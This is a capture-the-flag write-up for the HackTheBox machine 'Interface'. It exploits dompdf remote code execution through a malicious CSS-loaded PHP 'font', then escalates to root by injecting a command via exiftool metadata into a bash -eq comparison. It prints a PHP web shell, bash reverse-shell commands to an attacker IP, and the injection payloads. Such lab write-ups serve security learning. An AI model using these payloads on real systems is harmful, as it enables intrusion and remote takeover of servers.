HackTheBox — Interface

5 min read · May 13, 2023

Interface is a medium-rated Linux machine. Enumeration reveals an API subdomain in the Content-Security-Policy header, and fuzzing its endpoints uncovers dompdf, which is vulnerable to remote code execution via a remote CSS file that loads a malicious PHP "font", giving us a shell as www-data. With pspy we spot a bash script running as root; it uses a `[[ -eq ]]` comparison, which performs arithmetic evaluation (similar to eval) and can be abused to execute arbitrary commands.


Nmap scan report for
Host is up (0.38s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)
| 256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)
|_ 256 cc62905560a658629e6b80105c799b55 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


The web server shows a note about the site being under maintenance

Fuzzing for files and directories using dirsearch

The fuzzing didn’t find anything, but checking the response headers shows a Content-Security-Policy header listing some hosts, among them prd.m.rendering-api.interface.htb
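The header check is a one-liner with curl; a quick sketch against the box (hostname from the scan above):

```shell
# Fetch only the response headers; the Content-Security-Policy header
# lists allowed sources, which leaks the API vhost
curl -s -I --max-time 5 http://interface.htb/ | grep -i 'content-security-policy' || true
```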

On this vhost I tried fuzzing again, but there were no results other than `vendor`, so I fuzzed inside it to see if anything is accessible

This found `/dompdf`, but it returns a 403

Since the subdomain tells us this is an API, let’s try fuzzing /api with POST requests
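A sketch of that POST fuzz with wfuzz (the wordlist path is the usual seclists location; adjust the filters to the server’s actual responses):

```shell
# Fuzz /api/ with POST requests; hide 404 responses to spot valid endpoints
wfuzz -c -X POST --hc 404 \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u 'http://prd.m.rendering-api.interface.htb/api/FUZZ'
```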


For sending a POST request to html2pdf, I struggled a lot to find a proper way, and the documentation didn’t really cover it, so we can fuzz for the parameter instead. I went with wfuzz for this, setting the Content-Type to JSON, to find the parameter name:

wfuzz -X POST -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u 'http://prd.m.rendering-api.interface.htb/api/html2pdf/' -H 'Content-Type: application/json' -d'{"FUZZ":"test"}' --hh 36

With this request we’ll be able to convert HTML to PDF
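For instance, with the parameter the fuzz turns up (`html` here; treat the name as an assumption from my run), the conversion looks like this:

```shell
# POST HTML to the API and save the rendered PDF
curl -s --max-time 5 -X POST 'http://prd.m.rendering-api.interface.htb/api/html2pdf' \
  -H 'Content-Type: application/json' \
  -d '{"html":"<h1>test</h1>"}' -o out.pdf || true
```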

Dompdf is vulnerable to remote code execution: it can be made to load a remote CSS file, which in turn loads a font that dompdf caches locally

Our CSS file loads a font that is actually a PHP file executing phpinfo(), and as the article explains, dompdf accepts any file extension as long as the file header belongs to a font

@font-face {
    /* font name and attacker IP below are placeholders */
    font-family: 'exploitfont';
    src: url('http://10.10.14.2/exploit_font.php');
    font-weight: 'normal';
    font-style: 'normal';
}

And we have the malicious font file
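One way to build that file: start with a font header and append the PHP. A minimal sketch — the 4-byte TrueType magic below is only a stand-in for illustration; for the real exploit, prepend an actual .ttf file:

```shell
# Start with a TrueType header so dompdf's font check passes,
# then append the PHP payload; the .php extension is kept
printf '\x00\x01\x00\x00' > exploit_font.php   # TTF magic bytes (stand-in for a real font)
echo '<?php phpinfo(); ?>' >> exploit_font.php
```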

We need to load the CSS from our machine, so we send a request with an href pointing to it

<link rel=stylesheet href=''>

To execute the cached PHP font file, we need to work out the URL it was cached under


The cached filename embeds an MD5 hash of the URL the font was fetched from, so we calculate that hash
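The hash can be computed locally (the IP is a placeholder for the attacker machine, and must match the URL in the CSS exactly):

```shell
# MD5 of the exact URL dompdf fetched the font from
echo -n 'http://10.10.14.2/exploit_font.php' | md5sum | cut -d ' ' -f 1
```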

So the url becomes


We can now get RCE by simply using `<?php system($_GET['cmd']); ?>` as the payload instead of phpinfo()
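The command then runs through the cmd parameter; a sketch, where HASH stands for the MD5 computed earlier and the fonts path is where dompdf caches under vendor:

```shell
# Execute id through the cached PHP "font" (HASH is a placeholder)
curl -s --max-time 5 \
  'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_HASH.php?cmd=id' || true
```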

With PHP executing our commands, we can get a reverse shell
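A sketch of that step (attacker IP/port are placeholders; `--data-urlencode` takes care of the spaces and special characters in the shell one-liner):

```shell
# On the attacker machine, listen first:  nc -lvnp 4444
# Then trigger a bash reverse shell through the cmd parameter
curl -s --max-time 5 -G \
  --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"' \
  'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_HASH.php' || true
```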


Privilege Escalation (root)

Running pspy, we see a bash script, /usr/local/sbin/cleancache.sh, being run as the root user

Checking the bash script

#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
    if [[ -f "$cfile" ]]; then
        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi
    fi
done

The script iterates over the /tmp directory, uses exiftool to read each file’s Producer tag, compares it with -eq against dompdf, and deletes the file on a match. I checked the exiftool version, 12.55, and there’s no reported vulnerability for it

The vulnerability is the comparison itself: inside [[ ]], -eq is an arithmetic operator, so bash evaluates both operands as arithmetic expressions (much like eval), which allows arbitrary commands to be executed

"$meta_producer" -eq "dompdf"

Testing whether we get the output of the id command by including it in the Producer metadata:

exiftool -Producer='a[$(id)]+dompdf' ./export.pdf

This works, but we can’t use spaces here because the Producer metadata is split with cut on a space; so instead I created a bash script containing the reverse shell and referenced it by path
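The helper script can be as simple as this (attacker IP/port are placeholders; /dev/shm matches the path referenced in the Producer tag below):

```shell
# Drop a reverse-shell helper on the target; the Producer payload
# can then call it by path, with no spaces needed
cat > /dev/shm/uwu.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/4444 0>&1
EOF
chmod +x /dev/shm/uwu.sh
```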

exiftool -Producer='a[$(/dev/shm/uwu.sh)]+dompdf' ./export.pdf

After transferring the PDF to /tmp, wait for the cron job to trigger the script